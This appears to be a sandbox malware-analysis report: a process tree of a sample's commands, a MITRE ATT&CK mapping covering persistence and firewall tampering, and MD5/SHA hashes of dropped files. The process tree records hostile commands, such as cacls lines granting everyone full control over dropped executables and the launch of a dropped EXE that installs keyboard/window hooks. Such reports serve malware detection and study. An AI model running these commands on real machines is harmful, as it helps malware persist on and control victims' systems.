C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:4412
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:556
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:4620
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:468
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3588
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:4840
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3204
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:1672
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:4932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5444
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:5164
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:4644
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5280
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.3MB
MD51bbfc205b34b59233a98fe5129abbb13
SHA1de9c51ae07a396a2127809513588586ae70447fe
SHA256494304090af04b0210eeab94234b34b7e02190aa28c4d6607081ed4154bc3adf
SHA51236e314a24f278615b928baa2c6492100c3730f183678d12a05c6f43ccfd9fce95688ab79dbaac70a8a9fdeb1c91fe4c9451072d1fdd867dd30f7fc6867fcf07a
-
Filesize
4.2MB
MD5df6bb581d9a52b206878b8314db7bbec
SHA1742bfca5f6470c8e083b75ade103a2f7d6d9f55a
SHA256037d9b751e865d751be465acbffb4322fc96a4974c53b36c894e80afaaa979c1
SHA512cb1b517ffe139f9898968cc115bfd524bacd147934b24bc3b971ac9512fbaf93697ce38471100081fea01cb75f02e4475c56b98ef8db2103cad1082c74fdc2cf
-
Filesize
2.7MB
MD5de757cdf5178cf669fa969359d6b9a3c
SHA1d1cab69a081cf789b7624c28d6640ea8c367b069
SHA2564ac81544e3e620a4ae8d176e9a3d79fc9e30eadea8fc5bb20c402277dfe6fe3e
SHA512a5aeee3ebcd69d0c3ecb782f3d7a577b5fb3612595cec59c84561cb1ad57166bbc358ba927e4b02a8f613d7b8d52d626a409a82daa76da5907ea1479fe3b37b2
-
Filesize
3.7MB
MD5cc50f078b8beaf3ead49bed9a66f25cd
SHA17e39dcf50aa7caa2f7ae4dba84e4ce1e72b59807
SHA2562ae3f6898dcef7f40ef51bff953618dcdd7b8d9048fbea143d68ad21e0f35ee7
SHA512c5bb03fab1fd9d407fd3889f33fb135414a1633c37d71befe015601e1c2d548af3e327fc268090a9e71c44af301d089151435846be1533a2326cb7555465417d
-
Filesize
2.9MB
MD50bfcca9b3bf924adacd5e513dfeb51b8
SHA107ab49bf92a35304f19e96f0ffd2de6626569450
SHA2569fe4c4c2a5fd19771363af60bef2ff4bca8c572d30f0e8c446fd77634eba17fc
SHA5124dcf1b4faa25258e61dbfdb057202c22721af2aecbebcabd86866226f990c2768a356daac3450a3d01381f54caf66296337a920360aa8f7e106747271fb0b3ca
-
Filesize
7.5MB
MD507776d502f72ad5d1eac445999d16898
SHA1b7ee554812fe542e9bcd0bca14e33880cea25557
SHA2562499d1689ee0734c507d615c66a197b8a03a6b267e7872fe3abbbf01e8d6c28f
SHA512c21797235598839afcdc5de06998b77d447cb97c438bfa160238b9b0ed6356840c7c9d1bc8beff01b1e7f3955849abbe18b13df8437791d5b6ed369e569511bb
-
Filesize
810KB
MD5c4b34a6adb0769ea86a1de7f8775711c
SHA184f82d58cff35217032d6ff3b6217e61aeda3118
SHA256119aec90ae509bc087586e6e021327cca657fb76fd6cb143766cf75cff5ab9d3
SHA512bc72bb2190574781b8a4055ae0bc68214c3c1c48ab39f955da6482fa7d989450c3ae8dccfe59621fd9933da98bfb3fb566b0daf7127d897751ac45eb5b932c79
-
Filesize
44.3MB
MD5973e8063ec38abca82358b996554794e
SHA1f71dc80bb47421e033e0aa89cf4caa9bf69c446a
SHA256939ecf99b7264ac20e25010eef2784a9c71032ce5ee6661ae9373c733dde65f8
SHA51217c6d39a22fd218196349324627a46df18e164ba0b308071ff2c919d5f719f7806265eb13e5e907d37436e75183c7685277c3b87602ae9b07682a4b8e20d3fc0
-
Filesize
2.3MB
MD5b8019a4a1bbf5140e04e4eada79af47a
SHA16c76ba7e9dc77805694b066d919858be909b9986
SHA256de787c71f0b01c7533c5bcac5a782f14e491a1dd098b80e3ecede6d859d5d601
SHA512c5c357e3b5f88eae73d24debc40a929f5fba495ac5e918733baf7c1ddd3d871f3d6cbbfc4056e39c4e6e787e9c63948185a5e95f422f4b3c255c4fa2ff2959dd
-
Filesize
20.9MB
MD5e7eadfe4af7efd479a9c620fa0b5ecab
SHA16c07f2d0b59cdb40f9c6a2e968c3c565626ca0b9
SHA25698a12acceb1cd1af92425418a83fae91b4f019c0da2d57f74df2a2aef6be8bf6
SHA512b9f1bae5d41992153d4f3a068a42e6b3d7bc1ee38e8cdee4943263d89fb639c142f5143f262e053e41218de524c06b8101f4a843ed4f04b0b051a7f7fc978b13
-
Filesize
1.1MB
MD5e960664f0e2a13f1043a3047e0ab62bf
SHA17e5a4e169e91bee95dd544bc1dba4f8b89db8bcb
SHA2565b51cc30d666fb9d02f2375d37b03d8a8056147f57980524e5a08d5690917cc2
SHA512b8a39ad2aa710e5fc0c4da2e7f5832db2eedbc51cdaee407985f85f734488298c753cd095c7be65852d046b3c0f0482440c59c9ea7916656af1fed6894a5d401
-
Filesize
8.7MB
MD5ff3cd999adfe1038e34a8a5f956c92fd
SHA1ab6af398de891f72baeb672e04d43dab7abd5767
SHA25642c28d7979e006cb1d772f66b9d4b2a6a0a30f4f9e0836acadaad18495eab7b5
SHA5123d57e3f9d706f6b83091a78761cfd66a6ea044c37e42ec61e9cf6fb93a30cd1fdee19b0dd4d5f2c0b2dd23dcc8689573495603d28156d01b9e05101fee079104
-
Filesize
26.1MB
MD58e1982ebf217473381cc44e08319dcb8
SHA11b4a176d3d2ed84fff1a6b86428e5709fa14add5
SHA2560182cc7ee28ab7d96df58bb0c4490ae832f679590696d18ef64209f765454b59
SHA512b45335510935c2d86aef8ebd57cb21f68f5c3bb945a5a7729d5019d4260708df3388d17c0344696239b9574c9f4fd2cf8c7d2274682d82302ed2945d7560600f
-
Filesize
33.8MB
MD55d7340ded9b400ca5cf516181f05175b
SHA1712ccda70ead57ac345fc226be1aad1da233c9c9
SHA256b8e7265693cd6d0eb25a0d97c7014eedfbb13b6178ee373b7d222fa0b6b57d00
SHA512a59297413db1a8d798fbc481ac3ecf855e75f8da1a4176dc14166a87f63807c599a2bdbf0490fe36843ea6c01fdf201d9cb17b87257490a03cdae0206bf8e408
-
Filesize
2.0MB
MD5fd9bea8c4901e6fbc0dcf0fd7bafc3d0
SHA10a009f6675fcf9cb670b97da938a5d872d3954d8
SHA256cb317e56cc80085b08a0c4764d27cd080f2dee321be900059fe5e1bdd15a9436
SHA512907eb750b3a56522c94ad17d99e9e084b905c5eb948a6bfa01195d4235bac7518550f3a6875d54807f4ee78995b96a0d8fa9fcd49501437aef73383ffa2dacaf
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
7.9MB
MD59a450fa0f177c90d7724ee6a585731a4
SHA1d27740cee86d74fc494265f9ebb998bb39b8c2c4
SHA25608afb287ccf305f730b168800bd879817250da5c938de26da59f212c8fd8043c
SHA512a7001c10dbb6ad0ecc0e5c27c05c2a73e2c62e36b1169c57bc9a091dfd3c15a6a18b6adb29668da8b54db488b956110c4fa5bdecce2d4b708335d6f3c27492ab
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe